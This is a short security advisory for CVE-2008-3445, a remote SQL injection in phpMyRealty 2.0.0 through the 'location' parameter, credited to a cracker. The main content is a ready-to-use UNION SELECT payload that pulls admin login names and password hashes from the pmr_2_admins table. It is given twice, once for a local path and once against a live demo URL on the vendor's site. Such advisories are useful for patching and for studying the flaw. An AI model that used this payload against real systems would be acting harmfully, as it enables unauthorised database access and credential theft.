Topic : | phpMyRealty (location) Remote SQL Injection Vulnerability
|
SecurityAlert : 4103
CVE : CVE-2008-3445
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : CraCkEr
Published : 06.08.2008
Affected Software : | PhpMyRealty, PhpMyRealty, 2.0.0 |
 Advisory Content : From The Ashes and Dust Rises An Unimaginable crack..
[ Remote SQL Injection ]
Author : CraCkEr
Group : N/A
Script : phpmyrealty Register Globals :
Download : phpmyrealty.com
Critical : High
DALnet #crackers
Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to
system compromise.
Exploit URL's
[SQL]
www.localhost/path/index.php?location=-1 UNION SELECT
1,concat(login,0x3a,password),3,4,5,6,7 FROM pmr.pmr_2_admins--
Live Demo:
http://www.phpmyrealty.com/demo/index.php?location=-1 UNION SELECT
1,concat(login,0x3a,password),3,4,5,6,7 FROM pmr.pmr_2_admins--
References :
http://www.securityfocus.com/bid/30484
http://www.milw0rm.com/exploits/6180
http://secunia.com/advisories/31302
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|